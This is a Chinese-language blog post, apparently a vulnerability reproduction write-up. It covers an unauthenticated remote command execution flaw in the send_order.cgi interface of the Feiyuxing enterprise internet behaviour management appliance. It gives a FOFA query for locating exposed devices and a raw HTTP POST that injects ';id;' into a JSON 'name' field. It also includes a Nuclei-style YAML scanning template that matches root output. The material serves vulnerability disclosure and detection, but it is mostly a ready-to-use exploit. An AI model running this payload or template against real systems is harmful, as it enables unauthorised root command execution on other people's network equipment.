Babing
Published on 2024-08-30 / 0 Visits
0
0

F3-1飞鱼星-企业级智能上网行为管理系统-RCE

F3-1飞鱼星-企业级智能上网行为管理系统-RCE

漏洞描述:

飞鱼星企业级智能上网行为管理系统 send_order.cgi接口处存在远程命令执行漏洞,未经身份验证的攻击者可以利用此漏洞执行任意指令,且写入后门文件可获取服务器权限,造成严重威胁。

影响版本:

至2024年3月30日

网站图片:

image.png

网络测绘:

fofa语法:

FOFA:title==“飞鱼星企业级智能上网行为管理系统”

漏洞复现:

payload:

POST /send_order.cgi?parameter=operation HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

{"opid":"1","name":";id;","type":"rest"}

效果图:
image.png

Yaml模板

id: F3-1FeiYunXing-RCE

info:
  name: F3-1FeiYunXing-RCE
  author: Kpanda
  severity: critical
  description: 飞鱼星企业级智能上网行为管理系统 send_order.cgi接口处存在远程命令执行漏洞
  reference:
    - https://blog.csdn.net/qq_41904294/article/details/136884282?spm=1001.2014.3001.5502
  tags: FeiYunXing,RCE

requests:
  - method: POST
    path:
      - "{{BaseURL}}/send_order.cgi?parameter=operation"
    headers:
      Content-Type: application/x-www-form-urlencoded
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
    body: |
      opid=1&name=%3Bid%3B&type=rest
    matchers:
      - type: word
        words:
          - "uid=0(root) gid=0(root) groups=0(root)"
        part: body
      - type: status
        status:
          - 200

Comment